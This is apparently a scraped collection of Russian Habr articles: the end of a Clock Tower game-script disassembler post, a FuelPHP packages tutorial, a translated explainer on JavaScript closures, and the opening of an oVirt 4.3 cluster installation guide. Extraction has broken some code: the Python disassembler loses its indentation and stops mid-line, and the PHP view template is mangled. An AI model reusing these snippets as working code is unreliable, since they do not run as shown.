11720: 2A 2E
11729: D0 CC
1195D: 05 06
1C50F: 20 00
```
Работа на будущее — часть 5 — SCEDASM — дизассемблер SCE
--------------------------------------------------------
Следующим логичным шагом будет дизассемблирование всех других опкодов для создания текстового файла, который будет считываться в игре/редакторе.
Что-то вроде такого:
```
'''
Clocktower ADC Object File Disassembler by rFx
'''
import os,sys,binascii,struct
ADO_FILENAME = "CT_J.ADO"
ADT_FILENAME = "CT_J.ADT"
ADO_OP = {
0xFF00:"RETN", #Scene Prologue - 0 bytes of data. - Also an END value... the game looks to denote endings.
0xFF01:"UNK_01", # varying length data
0xFF02:"UNK_02", # 3 bytes of data
0xFF03:"UNK_03", # 3 bytes of data
0xFF04:"UNK_04", # 3 bytes of data
0xFF05:"UNK_05", # 3 bytes of data
0xFF06:"UNK_06", # 3 bytes of data
0xFF07:"UNK_07", # 3 bytes of data
0xFF0A:"UNK_0A", # 4 bytes of data. Looks like an offset to another link in the list?
0xFF0C:"UNK_0C", # 4 bytes of data
0xFF0D:"UNK_0D", # 4 bytes of data
0xFF10:"UNK_10", # 4 bytes of data
0xFF11:"UNK_11", # 4 bytes of data
0xFF12:"UNK_12", # 4 bytes of data
0xFF13:"UNK_13", # 4 bytes of data
0xFF14:"UNK_14", # 4 bytes of data
0xFF15:"UNK_15", # 4 bytes of data
0xFF16:"UNK_16", # 4 bytes of data
0xFF1F:"UNK_1F", # 0 bytes of data
0xFF20:"ALL", # 0 bytes of data. Only at the end of the ADO (twice)
#All opcodes above this are like... prologue opcodes (basically in some other list)
0xFF21:"ALLEND", # 2 bytes of data
0xFF22:"JMP", # 2 bytes of data - I think it uses the value for the int offset in adt as destination +adds 2
0xFF23:"CALL", # 6 bytes of data
0xFF24:"EVDEF", # Not used in the game
0xFF25:"!!!!!!", #Not used in the game
0xFF26:"!!!!!!", #Not used in the game
0xFF27:"!!!!!!", #Not used in the game
0xFF28:"!!!!!!", #0 bytes of data.
0xFF29:"END_IF", # 4 bytes of data
0xFF2A:"WHILE", # 4 bytes of data
0xFF2B:"NOP", # 0 bytes of data
0xFF2C:"BREAK", # Not used in the game
0xFF2D:"ENDIF", # 2 bytes of data
0xFF2E:"ENDWHILE", # 2 bytes of data
0xFF2F:"ELSE", # 2 bytes of data
0xFF30:"MSGINIT", # 10 bytes of data
0xFF31:"MSGTYPE", # Not used in the game
0xFF32:"MSGATTR", # 16 bytes of data
0xFF33:"MSGOUT", # Varying length, our in-game text uses this. :)
0xFF34:"SETMARK", #Varying length
0xFF35:"SETWAIT", #Not used in the game
0xFF36:"MSGWAIT", #0 bytes of data
0xFF37:"EVSTART", #4 bytes of data
0xFF38:"BGFILEDISP", #Not used in the game.
0xFF39:"BGLOAD", #Varying length, normally a path to a BMP file is passed in.
0xFF3A:"PALLOAD", #Varying length. Also takes BMP files.
0xFF3B:"BGMREQ", #Varying length - loads a MIDI file into memory.
0xFF3C:"SPRCLR", #2 bytes of data.
0xFF3D:"ABSOBJANIM", #Not used in the game
0xFF3E:"OBJANIM", #Not used in the game.
0xFF3F:"ALLSPRCLR", #0 bytes of data
0xFF40:"MSGCLR", #0 bytes 0f data
0xFF41:"SCREENCLR", #0 bytes of data
0xFF42:"SCREENON", #0 bytes of data
0xFF43:"SCREENOFF", #0 bytes of data
0xFF44:"SCREENIN", # Not used in the game.
0xFF45:"SCREENOUT", # Not used in the game.
0xFF46:"BGDISP", # Always 12 bytes of data.
0xFF47:"BGANIM", #14 bytes of data.
0xFF48:"BGSCROLL",#10 bytes of data.
0xFF49:"PALSET", #10 bytes of data.
0xFF4A:"BGWAIT", #0 bytes of data.
0xFF4B:"WAIT", #4 bytes of data.
0xFF4C:"BWAIT", #Not used in the game.
0xFF4D:"BOXFILL", #14 bytes of data.
0xFF4E:"BGCLR", # Not used in the game.
0xFF4F:"SETBKCOL", #6 bytes of data.
0xFF50:"MSGCOL", #Not used in the game.
0xFF51:"MSGSPD", #2 bytes of data.
0xFF52:"MAPINIT", #12 bytes of data.
0xFF53:"MAPLOAD", #Two Paths... Sometimes NULL NULL - Loads the background blit bmp and the map file to load it.
0xFF54:"MAPDISP", #Not used in the game.
0xFF55:"SPRENT", #16 bytes of data.
0xFF56:"SETPROC", #2 bytes of data.
0xFF57:"SCEINIT", #0 bytes of data.
0xFF58:"USERCTL", #2 bytes of data.
0xFF59:"MAPATTR", #2 bytes of data.
0xFF5A:"MAPPOS", #6 bytes of data.
0xFF5B:"SPRPOS", #8 bytes of data.
0xFF5C:"SPRANIM", #8 bytes of data.
0xFF5D:"SPRDIR", #10 bytes of data.
0xFF5E:"GAMEINIT", #0 bytes of data.
0xFF5F:"CONTINIT", #0 bytes of data.
0xFF60:"SCEEND", #0 bytes of data.
0xFF61:"MAPSCROLL", #6 bytes of data.
0xFF62:"SPRLMT", #6 bytes of data.
0xFF63:"SPRWALKX", #10 bytes of data.
0xFF64:"ALLSPRDISP", #Not used in the game.
0xFF65:"MAPWRT", #Not used in the game.
0xFF66:"SPRWAIT", #2 bytes of data.
0xFF67:"SEREQ", #Varying length - loads a .WAV file.
0xFF68:"SNDSTOP", #0 bytes of data.
0xFF69:"SESTOP", #Varying length - specifies a .WAV to stop or ALL for all sounds.
0xFF6A:"BGMSTOP", #0 bytes of data.
0xFF6B:"DOORNOSET", #0 bytes of data.
0xFF6C:"RAND", #6 bytes of data.
0xFF6D:"BTWAIT", #2 bytes of data
0xFF6E:"FAWAIT", #0 bytes of data
0xFF6F:"SCLBLOCK", #Varying length - no idea.
0xFF70:"EVSTOP", #Not used in the game.
0xFF71:"SEREQPV", #Varying length - .WAV path input, I think this is to play and repeat.
0xFF72:"SEREQSPR", #Varying length - .WAV path input, I think this is like SEREQPV except different somehow.
0xFF73:"SCERESET", #0 bytes of data.
0xFF74:"BGSPRENT", #12 bytes of data.
0xFF75:"BGSPRPOS", #Not used in the game.
0xFF76:"BGSPRSET", #Not used in the game.
0xFF77:"SLANTSET", #8 bytes of data.
0xFF78:"SLANTCLR", #0 bytes of data.
0xFF79:"DUMMY", #Not used in the game.
0xFF7A:"SPCFUNC", #Varying length - usage uncertain.
0xFF7B:"SEPAN", #Varying length - guessing to set the L/R of Stereo SE.
0xFF7C:"SEVOL", #Varying length - guessing toe set the volume level of SE
0xFF7D:"BGDISPTRN", #14 bytes of data.
0xFF7E:"DEBUG", #Not used in the game.
0xFF7F:"TRACE", #Not used in the game.
0xFF80:"TMWAIT", #4 bytes of data.
0xFF81:"BGSPRANIM", #18 bytes of data.
0xFF82:"ABSSPRENT", #Not used in the game.
0xFF83:"NEXTCOM", #2 bytes of data.
0xFF84:"WORKCLR", #0 bytes of data.
0xFF85:"BGBUFCLR", #4 bytes of data.
0xFF86:"ABSBGSPRENT", #12 bytes of data.
0xFF87:"AVIPLAY", #This one is used only once - to load the intro AVI file.
0xFF88:"AVISTOP", #0 bytes of data.
0xFF89:"SPRMARK", #Only used in PSX Version.
0xFF8A:"BGMATTR",#Only used in PSX Version.
#BIG GAP IN OPCODES... maybe not even in existence.
0xFFA0:"UNK_A0", #12 bytes of data.
0xFFB0:"UNK_B0", #12 bytes of data.
0xFFDF:"UNK_DF", #2 bytes of data.
0xFFE0:"UNK_E0", #0 bytes of data.
0xFFEA:"UNK_EA", #0 bytes of data.
0xFFEF:"UNK_EF" #12 bytes of data.
}
if(__name__=="__main__"):
print("#Disassembling ADO/ADT...")
#Read ADO/ADT Data to memory.
f = open(ADO_FILENAME,"rb")
ado_data = f.read()
f.close()
f = open(ADT_FILENAME,"rb")
adt_data = f.read()
f.close()
scene_count = -1
#Skip ADO Header
i = 256
while i < (len(ado_data) -1):
cur_val = struct.unpack("
```
Потом, разумеется, нам нужно будет засунуть всё это обратно в пару ADO/ADT.
Работа на будущее — часть 6 — версия для PSX
--------------------------------------------
В версии игры для PSX тоже используются ADO/ADT. Похоже, мы сможем преобразовать ресурсы и добавить эксклюзивный контент с PSX в версию для PC. | https://habr.com/ru/post/332882/ | null | ru | null |
# Пакеты(packages) в Fuelphp
В данной статье я бы хотел поделиться знаниями о том, как устроены, для чего нужны и что из себя представляют [packages](http://docs.fuelphp.com/general/packages.html)(далее пакеты) в [Fuelphp](http://docs.fuelphp.com/). Прошу помочь сравнить реализацию и возможности пакетов Fuelphp с аналогами из других фреймворков. Думаю всем будет интересно узнать мнение адептов Simfony2 и Yii по этому поводу, милости просим, кидайте свои выкладки в комменты. Далее в примерах будет рассмотрен пакет [fuel-ninjauth](https://github.com/happyninjas/fuel-ninjauth)
#### Назначение пакетов в контексте Fuelphp
Для выполнения тех или иных повторяющихся глобальных задач, в приложении, уже давно применяется подход с использованием сервисов или же служб, что по сути одно и то же. Если просто, то сервис это объект, который выполняет какую-то глобальную задачу в контексте приложения. В Fuelphp роль таких сервисов выполняют пакеты.
#### Установка пакета
Пакетами можно делиться с сообществом. Есть несколько путей инсталляции пакетов, можно просто скопировать содержимое репозитория к себе в проект, использовать composer или воспользоваться утилитой [oil](http://docs.fuelphp.com/packages/oil/package.html).
Обратимся к oil с командой:
```
$ php oil package install ninjauth
```
Выполним миграцию, так как данный пакет использует данные из бд:
```
# Создадим таблицу users если таковой ещё нет
$ oil g migration create_users username:varchar[50] password:string group:int email:string last_login:integer login_hash:string profile_fields:text created_at:int
$ oil refine migrate
# Запустим миграцию для создания в бд таблицы "authentications"
$ oil refine migrate --packages=ninjauth
```
#### Структура пакета
Рассмотрим возможную структуру на примере пакета [fuel-ninjauth](https://github.com/happyninjas/fuel-ninjauth)

###### 1. Классы пакета
В папке classes находятся классы пакета. [Пример](https://github.com/happyninjas/fuel-ninjauth/blob/master/classes/strategy.php)
###### 1.1 Модели пакета
Модели также могут входить в состав классов пакета, когда пакет использует бд. [Пример](https://github.com/happyninjas/fuel-ninjauth/blob/master/classes/model/authentication.php)
###### 1.2. Контроллеры
Контроллеры в пакетах используются реже и в основном служат для формирования представлений внутри пакета. [Пример](https://github.com/happyninjas/fuel-ninjauth/blob/master/classes/controller.php) В итоге вся логика контроллера может сводится к чему то подобному:
```
return View::forge('register', array( //register - имя представления из папки №4 views
'user' => (object) compact('username', 'full_name', 'email', 'password')
));
```
###### 2. Конфигурация
Конфигурация или файл с настройками пакета. [Пример](https://github.com/happyninjas/fuel-ninjauth/blob/master/config/ninjauth.php)
Пример обращения к настройкам:
```
\Config::get('ninjauth.default_group');
```
###### 3. Миграции
В данной папке расположены классы миграций, которые нужны для быстрой сборки структуры данных в бд, создания необходимых таблиц и т.д.
###### 4. Представления
В пакете могут использоваться представления. Как правило пакет обрабатывает логику и не связан с формированием представления напрямую, но иногда может оказаться, что формирование представления внутри пакета будет хорошим решением.
Пример представления:
```
php echo Form::open(null, array('id' = 'register')); ?>
php if (isset($error)): ?
php echo $error; ?
php endif; ?
Username
php echo Form::input('username', $user-username) ?>
Full Name
php echo Form::input('full\_name', $user-full\_name) ?>
Email
php echo Form::input('email', $user-email) ?>
Password
php echo Form::password('password') ?
php echo Form::submit('submit') ?
php echo Form::close() ?
```
###### 5. Файл bootstrap.
Данный файл служит для описания файловой структуры пакета для автозагрузчика.
```
Autoloader::add_classes(array(
'NinjAuth\\Controller' => __DIR__.'/classes/controller.php',
'NinjAuth\\Exception' => __DIR__.'/classes/exception.php',
'NinjAuth\\CancelException' => __DIR__.'/classes/exception.php',
'NinjAuth\\ResponseException' => __DIR__.'/classes/exception.php',
'NinjAuth\\Model_Authentication' => __DIR__.'/classes/model/authentication.php',
'NinjAuth\\Strategy' => __DIR__.'/classes/strategy.php',
'NinjAuth\\Adapter' => __DIR__.'/classes/adapter.php',
'NinjAuth\\Adapter_SimpleAuth' => __DIR__.'/classes/adapter/simpleauth.php',
'NinjAuth\\Adapter_Sentry' => __DIR__.'/classes/adapter/sentry.php',
'NinjAuth\\Adapter_Warden' => __DIR__.'/classes/adapter/warden.php',
'NinjAuth\\Strategy_OAuth' => __DIR__.'/classes/strategy/oauth.php',
'NinjAuth\\Strategy_OAuth2' => __DIR__.'/classes/strategy/oauth2.php',
'NinjAuth\\Strategy_OpenId' => __DIR__.'/classes/strategy/openid.php',
));
```
Важно понимать, что файлы загружаются автоматически, и только в случае использования методов пакета. Иными словами, если нигде в отработке скрипта не использовались методы пакета, то и его классы загружены не будут. Это делает ваше приложение легче и быстрее. Единственное о чем всегда знает приложение это о расположении файлов bootstrap.php:

#### Примеры использования
Пакет NinjAuth является адаптером для стандартного пакета автроизации и сделать простой пример его работы будет сложновато. Поэтому возьмем пакет [fueltools](https://github.com/Maxlab/fueltools-package). Он нужен для отладки кода, когда нужно быстро посмотреть что возвращает метод или переменная. Итак, допустим мы пишем сотый метод нашего приложения:
```
public function action_save()
{
$var1 = 'var1';
$var2 = 'var2';
$orm = Model_Test::forge()->set('one', $var1)->set('two',$var2);
\Fueltools\FB::info($var1);
\Fueltools\FB::info($var2);
\Fueltools\FB::info($orm->save());
}
```
Смотрим результат выполнения данного метода в консоли Firefox:
Fuelphp загрузил только те классы пакетов ORM и FuelTools, которые требовались для отработки сценария:

#### Итоги
Fuelphp предоставляет в виде пакетов довольно широкие возможности:
— формирование упорядоченной и понятной архитектуры приложения
— применение сервисов, как в примере с [fueltools](https://github.com/Maxlab/fueltools-package)
— применение паттернов и подключение дополнительного функционала к уже имеющимся пакетам, как в пакете [fuel-ninjauth](https://github.com/happyninjas/fuel-ninjauth) который является адаптером к стандартному пакету Auth.
— пакеты позволяют брать на себя функции формирования представлений, а при желании в обычных контроллерах можно оставить только проверки и ввод-вывод, перенеся все остальное в пакеты.
— пакеты позволяют абстрагироваться от другого кода в приложении, его проще тестировать и подключать в другом проекте
— объекты и методы пакета становятся доступными в контексте всего приложения
— использование пакетов делает ваше приложение легче и быстрее
#### Src
— пакет [fuel-ninjauth](https://github.com/happyninjas/fuel-ninjauth)
— пакет [fueltools](https://github.com/Maxlab/fueltools-package)
— официальный репозиторий пакетов для Fuelphp [github.com](https://github.com/fuel-packages)
— репозиторий на форуме [fuel-packages](http://fuelphp.com/forums/view/10) | https://habr.com/ru/post/156449/ | null | ru | null |
# Почему вы должны дать еще один шанс замыканию
Привет, Хабр! Представляю вашему вниманию перевод статьи [«Why you should give the Closure function another chance»](https://medium.freecodecamp.org/why-you-should-give-the-closure-function-another-chance-31253e44cfa0) автора Cristi Salcescu.
В JavaScript функции могут быть вложены внутри других функций.
> Замыкание это когда внутренняя функция имеет доступ к переменным родительской функции, даже после того как родительская функция выполнена.
Как вы видите, это становится интересным, когда внутренняя функция продолжает существовать в вызове родительской функции. Это произойдет при следующих ситуациях:
* внутренняя функция используется как вызов для асинхронной задачи, такой как таймер, событие или AJAX.
* родительская функция возвращает внутреннюю функцию или объект, хранящий внутреннюю функцию.
Замыкание и таймеры
-------------------
В следующем примере мы ожидаем, что локальная переменная *x* будет немедленно уничтожена после выполнения функции *autorun()*, но она будет жива в течение 10 минут. Это связано с тем, что переменная *x* используется внутренней функцией *log()*. Функция *log()* является замыканием.
```
(function autorun(){
var x = 1;
setTimeout(function log(){
console.log(x);
}, 6000);
})();
```
Когда используется *setInterval()*, переменная, на которую ссылается функция замыкания, будет уничтожена только после вызова *clearInterval()*.
Замыкание и события
-------------------
Мы создаем замыкания каждый раз, когда переменные из внешних функций используются в обработчиках событий. Обработчик событий *increment()* является замыканием в следующем примере.
```
(function initEvents(){
var state = 0;
$("#add").on("click", function increment(){
state += 1;
console.log(state);
});
})();
```
Замыкание и асинхронные задачи
------------------------------
Когда используются переменные из внешней функции при асинхронном вызове, то вызов становится замыканием, а переменные останутся активными до завершения асинхронной задачи.
Таймеры, события и AJAX вызовы, возможно, являются наиболее распространенными асинхронными задачами, но есть и другие примеры: HTML5 Geolocation API, API WebSockets и requestAnimationFrame().
В следующем примере AJAX вызов *updateList()* является замыканием.
```
(function init(){
var list;
$.ajax({ url: "https://jsonplaceholder.typicode.com/users"})
.done(function updateList(data){
list = data;
console.log(list);
})
})();
```
Замыкание и инкапсуляция
------------------------
Другой способ увидеть замыкание — это функция с приватным состоянием. Замыкание инкапсулирует состояние.
Например, давайте создадим функцию *count()* с приватным состоянием. Каждый раз, когда она вызывается, она запоминает свое предыдущее состояние и возвращает следующее последовательное число. Переменная *state* является приватной, доступ к ней извне отсутствует.
```
function createCount(){
var state = 0;
return function count(){
state += 1;
return state;
}
}
var count = createCount();
console.log(count()); //1
console.log(count()); //2
```
Мы можем создать множество замыканий, разделяющих одно и то же приватное состояние. В следующем примере *increment()* и *decrement()* — это два замыкания, разделяющие одну и ту же переменную приватного состояния. Таким образом, мы можем создавать объекты с приватным состоянием.
```
function Counter(){
var state = 0;
function increment(){
state += 1;
return state;
}
function decrement(){
state -= 1;
return state;
}
return {
increment,
decrement
}
}
var counter = Counter();
console.log(counter.increment());//1
console.log(counter.decrement());//0
```
Замыкание против чистых функций
-------------------------------
**Замыкание используют переменные из внешней области видимости.**
**Чистые функции не используют переменные из внешней области видимости.** Чистые функции должны возвращать значение, вычисленное с использованием только переданных ему значений, и не может быть никаких побочных эффектовю.
Асинхронные задачи: замыкание и циклы
-------------------------------------
В следующем примере я создам пять замыканий для пяти асинхронных задач, причем все используют одну и ту же переменную *i*. Поскольку переменная *i* изменяется во время цикла, все *console.log()* отображают одно и то же значение — последнее.
```
(function run(){
var i=0;
for(i=0; i< 5; i++){
setTimeout(function logValue(){
console.log(i); //5
}, 100);
}
})();
```
Один из способов устранить эту проблему — использовать IIFE (Immediately Invoked Function Expression). В следующем примере есть еще пять замыканий, но более пяти разных переменных *i*.
```
(function run(){
var i=0;
for(i=0; i<5; i++){
(function autorunInANewContext(i){
setTimeout(function logValue(){
console.log(i); //0 1 2 3 4
}, 100);
})(i);
}
})();
```
Другой вариант — использовать новый способ объявления переменных: через *let*, доступный как часть ECMAScript 6. Это позволит создать переменную локально для области видимости блока на каждой итерации.
```
(function run(){
for(let i=0; i<5; i++){
setTimeout(function logValue(){
console.log(i); //0 1 2 3 4
}, 100);
}
})();
```
Я считаю, что это лучший вариант для этой проблемы с точки зрения читаемости.
Замыкание и сборщик мусора
--------------------------
В JavaScript локальные переменные функции будут уничтожены после возвращения функции, если на них нет ни одной ссылки. Приватное состояние замыкания становится подходящим для сбора мусора после того, как само замыкание было убрано. Чтобы сделать это возможным, у замыкания не должно быть больше ссылки на него.
В следующем примере я сначала создаю замыкание *add()*
```
function createAddClosure(){
var arr = [];
return function add(obj){
arr.push(obj);
}
}
var add = createAddClosure();
```
Затем определяю две функции: одну для добавления большого количества объектов *addALotOfObjects()* и еще одну *clearAllObjects()* для задания ссылки *null*. Затем обе функции используются как обработчики событий.
```
function addALotOfObjects(){
for(let i=0; i<50000;i++) {
add({fname : i, lname : i});
}
}
function clearAllObjects(){
if(add){
add = null;
}
}
$("#add").click(addALotOfObjects);
$("#clear").click(clearAllObjects);
```
Нажатие *«Add»* добавит 50000 предметов в приватное состояние замыкания.

Я нажал *«Add»* три раза, а затем нажал *«Clear»*, чтобы установить ссылку *null*. После этого приватное состояние очищается.

Вывод
-----
Замыкание — лучший инструмент в нашей коробке с инструментами для создания инкапсуляции. Это также упрощает нашу работу с вызовами для асинхронных задач. Мы просто используем переменные, которые хотим, и они оживут к моменту вызова.
С другой стороны, очень полезно понять, как работают замыкания, чтобы убедиться, что замыкание будет удалено при сборке мусора, когда мы больше не нуждаемся в них.
> *Это, возможно, лучший функционал, когда-либо помещенный в язык программирования.
>
>
>
> Дуглас Крокфорд о замыкании.* | https://habr.com/ru/post/352882/ | null | ru | null |
# Создание отказоустойчивой ИТ инфраструктуры. Часть 2. Установка и настройка кластера oVirt 4.3
Эта статья является продолжением предыдущей – «[Создание отказоустойчивой ИТ инфраструктуры. Часть 1 — подготовка к развёртыванию кластера oVirt 4.3](https://habr.com/ru/company/lenvendo/blog/483980/)».
В ней будет рассмотрен процесс базовой установки и настройки кластера oVirt 4.3, для хостинга высокодоступных виртуальных машин, с учётом того, что все предварительные шаги по подготовке инфраструктуры, уже выполнены ранее.
Вводная часть
-------------
Основная цель статьи – не сколько выдать пошаговую инструкцию вида «**Next** -> **Yes** -> **Finish**», сколько показать некоторые особенности при его установке и настройке. Процесс по развёртыванию вашего кластера, не всегда может совпадать с описанным в ней, из-за особенностей инфраструктуры и окружения, но общие принципы будут одинаковыми.
С субъективной точки зрения, [oVirt 4.3](https://www.ovirt.org/) по своему функционалу похож на VMware vSphere версии 5.х, но конечно же со своими особенностями настройки и работы.
Для интересующихся, все отличия между RHEV (aka oVirt) и VMware vSphere можно найти в Интернете, например [здесь](https://www.redhat.com/cms/managed-files/vi-virtualization-vmware-competitive-review-f10106jm-201803_0_0.pdf), но всё же буду иногда отмечать их некоторые отличия или похожести между собой, по ходу статьи.
Отдельно хотелось бы немного сравнить работу с сетями для виртуальных машин. В oVirt реализован похожий принцип управления сетями для виртуальных машин (далее ВМ), как и в VMware vSphere:
* с помощью стандартного Linux bridge (в VMware — *Standard vSwitch*), работающего на хостах виртуализации;
* с помощью Open vSwitch (OVS) (в VMware — *Distributed vSwitch*) – это распределённый виртуальный коммутатор, состоящий из двух основных компонентов: центрального сервера OVN и контроллеров OVN на управляемых хостах.
Необходимо отметить, что из-за простоты реализации, в статье будет описана настройка сетей в oVirt'е для ВМ с помощью стандартного Linux bridge, который является стандартным выбором, при использовании гипервизора KVM.
В связи с этим имеется несколько базовых правил по работе с сетью в кластере, которые лучше не нарушать:
* Все сетевые настройки на хостах перед добавлением их в oVirt, должны быть идентичными, кроме IP адресов.
* После того, как хост взят под управление oVirt'ом, на нём крайне не рекомендуется что-то менять руками в сетевых настройках, без полной уверенности в своих действиях, так как агент oVirt просто откатит их на предыдущие, после рестарта хоста или агента.
* Добавление новой сети для ВМ, как и работы с ней, должно производиться только из консоли управления oVirt'ом.
Ещё одно важное замечание — для очень критичного окружения (весьма чувствительного к денежным потерям), всё-таки рекомендовалось бы использовать платную поддержку и использовать [Red Hat Virtualization 4.3](https://access.redhat.com/products/red-hat-virtualization#whatsnew). В процессе эксплуатации кластера oVirt, могут возникать некоторые моменты, по которым желательно как можно скорее получить квалифицированную помощь, а не разбираться с ними самостоятельно.
И наконец, рекомендуется перед развёртыванием кластера oVirt, ознакомиться с [официальной документацией](https://www.ovirt.org/documentation/), чтобы быть в курсе хотя бы основных понятий и определений, иначе далее статью читать будет немного трудно.
Базовыми для понимания статьи и принципов работы кластера oVirt, являются эти руководящие документы:
* [oVirt Installation Guide](https://www.ovirt.org/documentation/install-guide/Installation_Guide/)
* [oVirt Self-Hosted Engine Guide](https://www.ovirt.org/documentation/self-hosted/Self-Hosted_Engine_Guide/)
* [oVirt Administration Guide](https://www.ovirt.org/documentation/admin-guide/administration-guide/)
Объём там не очень большой, за час-два вполне можно осилить основные принципы, а для любителей подробностей рекомендуется почитать [Product Documentation for Red Hat Virtualization 4.3](https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.3/) — RHEV и oVirt по сути одно и тоже.
Итак, если все базовые настройки на хостах, коммутаторах и СХД выполнены, переходим непосредственно к развёртыванию oVirt.
Часть 2. Установка и настройка кластера oVirt 4.3
-------------------------------------------------
Для удобства ориентирования, приведу по списку основные разделы в этой статье, которые поочерёдно должны быть выполнены:
1. Установка управляющего сервера oVirt
2. Создание нового датацентра
3. Создание нового кластера
4. Установка дополнительных хостов в Self-Hosted окружение
5. Создание области хранения или Storage Domains
6. Создание и настройка сетей для виртуальных машин
7. Создание установочного образа для развёртывания виртуальной машины
8. Создание виртуальной машины
### Установка управляющего сервера oVirt
**Управляющий сервер oVirt** – это самый главный элемент в инфраструктуре oVirt, в виде виртуальной машины, хоста, или виртуального устройства, управляющего всей инфраструктурой oVirt.
Его близкие аналоги из мира виртуализации:
* VMware vSphere — vCenter Server
* Microsoft Hyper-V — System Center Virtual Machine Manager (VMM).
Для установки управляющего сервера oVirt, у нас имеется два варианта:
Вариант 1
Развёртывание сервера в виде специализированной ВМ или хоста.
Этот вариант вполне работает, но при условии, что такая ВМ работает независимо от кластера, т.е. не запущена на каком-либо хосте кластера в виде обычной виртуальной машины под управлением KVM.
Почему нельзя разворачивать такую ВМ на хостах кластера?
В самом начале процесса развёртывания управляющего сервера oVirt, у нас имеется дилемма — управляющую ВМ ставить нужно, но самого кластера фактически ещё нет, и поэтому что можно с ходу придумать? Правильно – установить KVM на будущий узел кластера, далее на нём создать виртуальную машину, например, с ОС CentOS и в ней развернуть oVirt engine. Это может делаться обычно из соображений полного контроля над такой ВМ, но это ошибочное намерение, потому что в таком случае, в дальнейшем 100% будут проблемы с такой управляющей ВМ:
* её нельзя будет мигрировать в консоли oVirt между хостами (узлами) кластера;
* при миграции средствами KVM через *virsh migrate*, эта ВМ будет недоступна к управлению из консоли oVirt.
* хосты кластера нельзя будет вывести в **Maintenance mode** (режим обслуживания), если мигрировать эту ВМ с хоста на хост с помощью *virsh migrate*.
Так что делайте всё по правилам — используйте для управляющего сервера oVirt или отдельный хост, или независимую ВМ, запущенную на нём, а лучше делайте как написано во втором варианте.
Вариант 2
Установка oVirt Engine Appliance на управляемый им же хост кластера.
Именно этот вариант будет рассмотрен далее, как более правильный и подходящий в нашем случае.
Требования к такой ВМ описаны ниже, добавлю лишь, что рекомендуется иметь минимум два хоста в инфраструктуре, на которых может быть запущена управляющая ВМ, чтобы сделать её отказоустойчивой. Здесь хотелось бы добавить, что как писал уже в комментариях в предыдущей статье, мне так и не удалось получить *splitbrain* на кластере oVirt из двух хостов, с возможностью запуска hosted-engine ВМ на них.
#### Установка oVirt Engine Appliance на первый хост кластера
Ссылка на официальную документацию — [oVirt Self-Hosted Engine Guide](https://www.ovirt.org/documentation/self-hosted/Self-Hosted_Engine_Guide/), глава «[Deploying the Self-Hosted Engine Using the Command line](https://www.ovirt.org/documentation/self-hosted/chap-Deploying_Self-Hosted_Engine.html)»
В документе указаны предварительные условия, которые должны быть выполнены перед развёртыванием hosted-engine ВМ, а также детально расписан сам процесс её установки, так что повторять его дословно нет особого смысла, поэтому акцентируем внимание не некоторых важных деталях.
* Перед началом всех действий, обязательно включаем поддержку виртуализации в настройках BIOS на хосте.
* Устанавливаем на хост пакет для установщика hosted-engine:
```
yum -y install http://resources.ovirt.org/pub/yum-repo/ovirt-release43.rpm
yum -y install epel-release
yum install screen ovirt-hosted-engine-setup
```
* Запускаем на хосте процедуру развёртывания oVirt Hosted Engine в screen'е (выйти из него можно через Ctrl-A + D, закрыть через Ctrl-D):
```
screen
hosted-engine --deploy
```
При желании можно запустить установку с заранее подготовленным файлом ответов:
```
hosted-engine --deploy --config-append=/var/lib/ovirt-hosted-engine-setup/answers/answers-ohe.conf
```
* Во время развёртывания hosted-engine, указываем все необходимые параметры:
```
- имя кластера
- количество vCPU и vRAM (рекомендуется 4 vCPU и 16 Гб)
- пароли
- тип хранилища для hosted engine ВМ – в нашем случае FC
- номер LUN для установки hosted engine
- где будет находиться база данных для hosted engine – рекомендую для простоты выбрать Local (это БД PostgreSQL работающая внутри этой ВМ)
и др. параметры.
```
* Для установки высокодоступной ВМ с hosted engine, на СХД нами был заранее создан специальный LUN под номером 4 и размером 150 Гб, который затем был презентован хостам кластера – см. в [предыдущей статье](https://habr.com/ru/company/lenvendo/blog/483980/).
Ранее мы также проверяли его видимость на хостах:
```
multipath -ll
…
3600a098000e4b4b3000003c95d171065 dm-3 DELL , MD38xxf
size=150G features='3 queue_if_no_path pg_init_retries 50' hwhandler='1 rdac' wp=rw
|-+- policy='service-time 0' prio=14 status=active
| `- 15:0:0:4 sdc 8:32 active ready running
`-+- policy='service-time 0' prio=9 status=enabled
`- 18:0:0:4 sdj 8:144 active ready running
```
* Сам процесс развёртывания hosted-engine ничего сложного в себе не несёт, в его конце мы должны получить примерно такое сообщение:
```
[ INFO ] Generating answer file '/var/lib/ovirt-hosted-engine-setup/answers/answers-20191129131846.conf'
[ INFO ] Generating answer file '/etc/ovirt-hosted-engine/answers.conf'
[ INFO ] Stage: Pre-termination
[ INFO ] Stage: Termination
[ INFO ] Hosted Engine successfully deployed
```
**Проверяем наличие сервисов oVirt на хосте:**
Если всё было сделано правильно, то после окончания установки заходим с помощью веб-браузера на *<https://ovirt_hostname/ovirt-engine>* с компьютера администратора, и кликаем [**Administration Portal**].
**Скриншот «Administration Portal»**
Введя логин и пароль (заданные в процессе установки) в окно как на скриншоте, попадаем в панель управления Open Virtualization Manager, в которой можно производить все действия с виртуальной инфраструктурой:
1. добавлять датацентр
2. добавлять и настраивать кластер
3. добавлять хосты и управлять ими
4. добавлять области хранения или Storage Domains, для дисков виртуальных машин
5. добавлять и настраивать сети для виртуальных машин
6. добавлять виртуальные машины, установочные образы, шаблоны ВМ и управлять ими

Все эти действия будут рассмотрены далее, что-то в крупную клетку, что-то более подробно и с нюансами.
Но сначала рекомендовал бы почитать это дополнение, которое наверняка многим может пригодиться.
**Дополнение**
**1)** В принципе, если есть такая необходимость, то ничего не мешает заранее установить гипервизор KVM на узлы кластера, используя пакеты ***libvirt*** и ***qemu-kvm*** (или ***qemu-kvm-ev***) желаемой версии, хотя при развёртывании узла кластера oVirt, он может это сделать и сам.
Но если ***libvirt*** и ***qemu-kvm*** были установлены не самой свежей версии, то можно получить такую ошибку во время развёртывания hosted engine:
```
error: unsupported configuration: unknown CPU feature: md-clear
```
Т.е. необходимо иметь [обновлённую версию](https://centos.pkgs.org/7/centos-updates-x86_64/libvirt-4.5.0-10.el7_6.12.x86_64.rpm.html) ***libvirt*** с защитой от [MDS](https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/MDS), который поддерживает такую политику:
Устанавливаем libvirt v.4.5.0-10.el7\_6.12, с поддержкой md-clear:
```
yum-config-manager --disable mirror.centos.org_centos-7_7_virt_x86_64_libvirt-latest_
yum install centos-release-qemu-ev
yum update
